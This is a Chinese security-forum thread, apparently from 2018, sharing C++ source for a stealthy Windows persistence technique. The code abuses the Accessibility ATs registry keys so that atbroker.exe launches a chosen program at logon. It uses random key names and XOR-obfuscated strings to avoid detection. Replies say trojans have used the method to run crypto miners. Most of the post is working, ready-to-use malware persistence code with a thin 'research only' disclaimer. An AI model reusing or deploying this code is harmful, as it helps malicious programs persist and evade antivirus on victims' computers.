首页
论坛
课程
招聘
[分享]很有时间系列:一种比较奇怪的启动方法
2018-5-18 16:23 6293

[分享]很有时间系列:一种比较奇怪的启动方法

2018-5-18 16:23
6293
//代码请勿用于违反当地法律的事情,代码仅供研究使用
//想吹水就来QQ群:48715131
通过比较奇怪的注册表达到开机启动的目的。
开机登陆后由atbroker.exe作为一个启动程序来启动第二步的程序。

//利用代码,boot.exe是要开机启动的程序
install_ATs(_T("C:\\boot.exe"),_T("7777777"));
效果:

具体写注册代码如下:(XorStringW来自https://github.com/Tai7sy/vs-obfuscation)
int get_rand(std::size_t _min,std::size_t _max)
{
	std::random_device                 r;
	std::mt19937                       rand(r());
	std::uniform_int_distribution<int> uniform_dist(_min, _max);
	return uniform_dist(rand);
}
bool install_ATs(LPCTSTR ExePath, LPCTSTR Arg)
{
	//ATS安装exe持久化
	//HKEY_LOCAL_MACHINE
	//SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
	HKEY hKey = nullptr;
	HKEY hKey1 = nullptr;
	HKEY hKey2 = nullptr;
	auto exit_sope = std::experimental::make_scope_exit([&]() {
		RegCloseKey(hKey);
		RegCloseKey(hKey1);
		RegCloseKey(hKey2);
	});
	do {
		auto status = RegOpenKeyExW(
			HKEY_LOCAL_MACHINE,
			XorStringW(L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"),
			0,
			KEY_ALL_ACCESS,
			&hKey);
		if (status != ERROR_SUCCESS)
		{
			break;
		}
		//随机名字
		WCHAR *pRandArray = XorStringW(L"qwertyuiopasdfghjklzxcvbnm1234567890");
		WCHAR newName[8] = {};
		for (auto i=0;i<RTL_NUMBER_OF(newName)-1;i++)
		{
			newName[i] = pRandArray[get_rand(0, wcslen(pRandArray))];
		}
		//创建子健
		status = RegCreateKeyEx(hKey,
			newName, 
			0,
			nullptr,
			REG_OPTION_NON_VOLATILE,
			KEY_ALL_ACCESS, 
			nullptr,
			&hKey1,
			nullptr);
		if (status!=ERROR_SUCCESS)
		{
			break;
		}
		status = RegSetValueExW(hKey1, XorStringW(L"StartExe"),
			0, REG_SZ, (const BYTE*)ExePath, (DWORD)(sizeof(TCHAR)*(_tcslen(ExePath) + 1)));
		if (status!=ERROR_SUCCESS)
		{
			break;
		}
		status = RegSetValueExW(hKey1, XorStringW(L"StartParams"),
			0, REG_SZ, (const BYTE*)Arg, (DWORD)(sizeof(TCHAR)*(_tcslen(Arg) + 1)));
		if (status != ERROR_SUCCESS)
		{
			break;
		}
		//SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1
		status = RegCreateKeyEx(HKEY_CURRENT_USER,
			XorStringW(L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility"),
			0,
			nullptr,
			REG_OPTION_NON_VOLATILE,
			KEY_ALL_ACCESS,
			nullptr,
			&hKey2,
			nullptr);
		if (status!=ERROR_SUCCESS)
		{
			break;
		}
		status = RegSetValueExW(hKey2, XorStringW(L"Configuration"),
			0, REG_SZ, (const BYTE*)newName, sizeof(newName));
		if (status != ERROR_SUCCESS)
		{
			break;
		}
		RegCloseKey(hKey2);
		status = RegCreateKeyEx(HKEY_CURRENT_USER,
			XorStringW(L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session1"),
			0,
			nullptr,
			REG_OPTION_NON_VOLATILE,
			KEY_ALL_ACCESS,
			nullptr,
			&hKey2,
			nullptr);
		if (status!=ERROR_SUCCESS)
		{
			break;
		}
		status = RegSetValueExW(hKey2, XorStringW(L"Configuration"),
			0, REG_SZ, (const BYTE*)newName, sizeof(newName));
		if (status != ERROR_SUCCESS)
		{
			break;
		}
		return true;
	} while (0);

	return false;
}
效果一般般,只是这个启动点比较不常见。

第五届安全开发者峰会(SDC 2021)10月23日上海召开!限时2.5折门票(含自助午餐1份)

最后于 2018-5-18 17:04 被cvcvxk编辑 ,原因: 贴图,补充缺少的一句代码
收藏
点赞0
打赏
分享
最新回复 (14)
雪    币: 2473
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
PYGame 活跃值 2018-5-18 17:46
2
0
66666666
win通用吗
雪    币: 8670
活跃值: 活跃值 (814)
能力值: ( LV12,RANK:760 )
在线值:
发帖
回帖
粉丝
cvcvxk 活跃值 10 2018-5-18 17:52
3
0
PYGame 66666666 win通用吗
自行测试
雪    币: 1506
活跃值: 活跃值 (477)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
chinasmu 活跃值 2018-5-21 15:11
4
0
吹水也要付费啊
雪    币: 388
活跃值: 活跃值 (405)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
wowocock 活跃值 1 2018-5-21 16:33
5
0
前几天报道有木马利用这个来挖矿,现在各大杀软开始对其严防死守了。
雪    币: 8670
活跃值: 活跃值 (814)
能力值: ( LV12,RANK:760 )
在线值:
发帖
回帖
粉丝
cvcvxk 活跃值 10 2018-5-21 21:51
6
0
wowocock 前几天报道有木马利用这个来挖矿,现在各大杀软开始对其严防死守了。
是的,已经死了。
雪    币: 501
活跃值: 活跃值 (167)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
Justgoon 活跃值 1 2018-5-23 16:30
7
0
win8以上能用-,-
雪    币: 78
活跃值: 活跃值 (124)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
工程 活跃值 2018-5-29 14:19
8
0
雪    币: 19
活跃值: 活跃值 (394)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
猪会被杀掉 活跃值 1 2018-5-29 14:30
9
0
感谢,对文中的XorStringW比较感兴趣。
雪    币: 2694
活跃值: 活跃值 (77)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
BlackJZero 活跃值 2018-5-29 21:59
10
0
雪    币: 95
活跃值: 活跃值 (180)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
EXHades 活跃值 2018-5-29 22:56
11
0
666
雪    币: 6
活跃值: 活跃值 (330)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
路易 活跃值 2018-6-26 10:49
12
0
群现在要钱加入了。。。
以前表妹在的时候是免费的
雪    币: 89
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
gabpfiugdu 活跃值 2018-6-27 02:03
13
0
这个挖矿木马如何手动处理
雪    币: 42
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
chunklu 活跃值 2018-10-8 16:37
14
0
XorStringW是个好东西
雪    币: 4
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
wanalj 活跃值 2018-11-5 20:52
15
0
可以加你微信吗?
游客
登录 | 注册 方可回帖
返回